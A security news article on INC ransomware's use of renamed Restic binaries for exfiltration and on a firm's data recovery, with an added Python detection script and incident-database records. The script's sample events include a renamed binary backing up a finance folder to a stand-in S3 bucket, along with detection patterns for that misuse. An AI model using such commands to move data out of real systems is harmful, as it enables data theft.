Ransomware Gang’s Operational Slip-Up Enables Data Recovery for 12 US Firms
Researchers at Florida-based cybersecurity firm Cyber Centaurs successfully recovered stolen data from 12 U.S. companies targeted by the INC ransomware group after uncovering a critical lapse in the gang’s operational security. The discovery stemmed from the group’s reliance on Restic, a legitimate open-source backup tool repurposed to encrypt and exfiltrate victim data to attacker-controlled cloud storage.
By analyzing artifacts left behind by the gang, including renamed Restic binaries (e.g., winupdate.exe), PowerShell scripts, and configuration variables, Cyber Centaurs developed a custom enumeration script to identify S3-style cloud repositories tied to the group’s infrastructure. Using the attackers’ own tooling and encryption semantics, investigators safely listed snapshots without altering the repositories, confirming the presence of stolen datasets from multiple victims.
The INC gang, active since July 2023, typically employs spear-phishing to compromise credentials and adapts its exfiltration tactics based on network complexity. In smaller environments, it relies on Restic; in larger ones, it hijacks existing backup systems like Veeam. The recovered data, though encrypted, was decrypted using Restic’s native functionality, as the tool itself was the encryption mechanism. Law enforcement was subsequently engaged to validate the data’s origins.
Key findings from the investigation include:
- Infrastructure Reuse: The gang repurposes cloud storage across multiple victims, treating ransomware as a scalable business model rather than isolated attacks.
- Detection Opportunities: Restic executions outside expected backup contexts, particularly from system directories or user-writable locations, can signal compromise.
- Operational Patterns: Attackers often rename binaries and leverage legitimate execution paths to evade detection.
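The two detection findings above (Restic running outside an expected backup context, and renamed binaries) can be turned into a simple process-creation triage rule. The following is an added example written for this page; it is not code from the Cyber Centaurs report. It assumes Sysmon-style event fields (Image, OriginalFileName, CommandLine, User), an invented allow-list of directories where a sanctioned Restic install lives, and a few constructed sample events. The Restic subcommands and the -r/--repo flag are the real restic CLI; the winupdate.exe name comes from the article, everything else is constructed.

```python
"""Flag process-creation events that resemble Restic running outside an
expected backup context, or a Restic binary that has been renamed.
Added example; field names, allow-list and sample events are assumptions."""
import re
from pathlib import PureWindowsPath

# Assumption: directories where this organisation's sanctioned Restic lives.
EXPECTED_BACKUP_DIRS = {r"c:\program files\backupagent"}

# Real restic subcommands and repository flag (restic CLI), lower-cased.
RESTIC_SUBCOMMANDS = {"init", "backup", "snapshots", "restore", "forget",
                      "prune", "check", "ls", "dump", "unlock"}
REPO_FLAG = re.compile(r"(?:^|\s)(?:-r|--repo)\s+(\S+)", re.IGNORECASE)
# Restic backend prefixes that point at remote storage (real restic syntax).
REMOTE_BACKENDS = ("s3:", "b2:", "azure:", "gs:", "sftp:", "rest:", "rclone:")


def looks_like_restic(event):
    """Return a reason string if the event resembles Restic, else None."""
    image = PureWindowsPath(event.get("Image", ""))
    orig_name = (event.get("OriginalFileName") or "").lower()
    cmd = event.get("CommandLine") or ""

    # PE version info still says restic.exe but the file on disk is called
    # something else: the renaming pattern described in the report.
    if orig_name == "restic.exe" and image.name.lower() != "restic.exe":
        return "renamed-binary"

    # No version info to go on: fall back to command-line semantics.
    repo = REPO_FLAG.search(cmd)
    tokens = cmd.lower().split()
    if repo and any(t in RESTIC_SUBCOMMANDS for t in tokens):
        if repo.group(1).lower().startswith(REMOTE_BACKENDS):
            return "restic-cli-remote-repo"
        return "restic-cli"
    return None


def analyse(events):
    """Return findings for Restic-like executions outside expected paths."""
    findings = []
    for ev in events:
        reason = looks_like_restic(ev)
        if reason is None:
            continue
        image = PureWindowsPath(ev.get("Image", ""))
        parent_dir = str(image.parent).lower()
        in_expected = any(parent_dir.startswith(d) for d in EXPECTED_BACKUP_DIRS)
        # A renamed binary is suspicious anywhere; a genuine restic.exe is
        # only suspicious when it runs from an unexpected directory.
        if reason == "renamed-binary" or not in_expected:
            findings.append({"image": str(image), "reason": reason,
                             "user": ev.get("User")})
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\BackupAgent\restic.exe",
     "OriginalFileName": "restic.exe",
     "CommandLine": r"restic.exe -r rest:https://backup.internal/repo backup D:\Shares",
     "User": r"CORP\svc_backup"},                       # sanctioned backup job
    {"Image": r"C:\Windows\System32\winupdate.exe",
     "OriginalFileName": "restic.exe",
     "CommandLine": r"winupdate.exe -r s3:s3.example.invalid/bucket backup C:\Users\Finance",
     "User": r"CORP\jdoe"},                             # renamed binary in a system dir
    {"Image": r"C:\Users\Public\svc.exe",
     "OriginalFileName": None,
     "CommandLine": r"svc.exe --repo s3:s3.example.invalid/bucket init",
     "User": r"CORP\jdoe"},                             # user-writable dir, version info stripped
    {"Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe notes.txt",
     "User": r"CORP\jdoe"},                             # unrelated process
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"{f['reason']:24} {f['user']:16} {f['image']}")
```

On the sample set the sanctioned job and notepad are ignored, while the renamed winupdate.exe and the stripped svc.exe in a user-writable directory are both reported. In practice the allow-list would come from your backup inventory, and the remote-repository reason is worth correlating with the unexpected encrypted transfers the article recommends watching for.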
While Cyber Centaurs’ managing principal acknowledged the recovery was a temporary setback for the gang (which can easily spin up new infrastructure), the case highlights how defenders can exploit attacker missteps. The firm’s report also provided indicators of compromise, including the use of AnyDesk for remote access, and emphasized the need to monitor for unexpected encrypted data transfers to unfamiliar IP addresses.
The INC group has previously exploited vulnerabilities in Citrix Netscaler ADC/Gateway and deployed a Linux variant of its ransomware. This incident underscores the broader trend of ransomware gangs weaponizing legitimate tools to evade detection and maintain persistence.
Cyber Centaurs cybersecurity rating report: https://www.rankiteo.com/company/cyber-centaurs
{
"id": "CYB1769138524",
"linkid": "cyber-centaurs",
"type": "Ransomware",
"date": "7/2023",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
}
{'affected_entities': [{'location': 'United States', 'type': 'Company'}],
 'attack_vector': 'Spear-phishing, Exploitation of vulnerabilities (Citrix Netscaler ADC/Gateway)',
 'data_breach': {'data_encryption': True, 'data_exfiltration': True},
 'description': 'Researchers at Florida-based cybersecurity firm Cyber Centaurs successfully recovered stolen data from 12 U.S. companies targeted by the INC ransomware group after uncovering a critical lapse in the gang’s operational security. The discovery stemmed from the group’s reliance on Restic, a legitimate open-source backup tool repurposed to encrypt and exfiltrate victim data to attacker-controlled cloud storage. The recovered data was decrypted using Restic’s native functionality, and law enforcement was engaged to validate the data’s origins.',
 'impact': {'data_compromised': True},
 'initial_access_broker': {'entry_point': 'Spear-phishing, Citrix Netscaler ADC/Gateway vulnerabilities'},
 'investigation_status': 'Completed (data recovery achieved)',
 'lessons_learned': 'Attackers reuse infrastructure across victims, repurpose legitimate tools (e.g., Restic, AnyDesk) to evade detection, and leave artifacts (e.g., renamed binaries, PowerShell scripts) that can be exploited by defenders. Monitoring for unexpected encrypted data transfers and tool executions outside expected contexts can aid detection.',
 'motivation': 'Financial gain',
 'post_incident_analysis': {'corrective_actions': 'Enhanced monitoring for tool misuse, detection of unexpected encrypted data transfers, law enforcement engagement for data validation',
                            'root_causes': 'Operational security lapse (reuse of Restic for encryption/exfiltration, artifacts left behind), reliance on legitimate tools to evade detection'},
 'ransomware': {'data_encryption': True,
                'data_exfiltration': True,
                'ransomware_strain': 'INC ransomware'},
 'recommendations': ['Monitor for Restic executions outside expected backup contexts, particularly from system directories or user-writable locations.',
                     'Detect unexpected encrypted data transfers to unfamiliar IP addresses.',
                     'Track renamed binaries and legitimate tools (e.g., AnyDesk) used for malicious purposes.'],
 'references': [{'source': 'Cyber Centaurs report'}],
 'response': {'enhanced_monitoring': 'Monitoring for Restic executions outside expected backup contexts',
              'law_enforcement_notified': True,
              'recovery_measures': 'Data recovery from attacker-controlled cloud storage',
              'remediation_measures': 'Data recovery via Restic decryption, monitoring for unexpected encrypted data transfers',
              'third_party_assistance': 'Cyber Centaurs'},
 'threat_actor': 'INC ransomware group',
 'title': 'Ransomware Gang’s Operational Slip-Up Enables Data Recovery for 12 US Firms',
 'type': 'Ransomware',
 'vulnerability_exploited': 'Citrix Netscaler ADC/Gateway vulnerabilities'}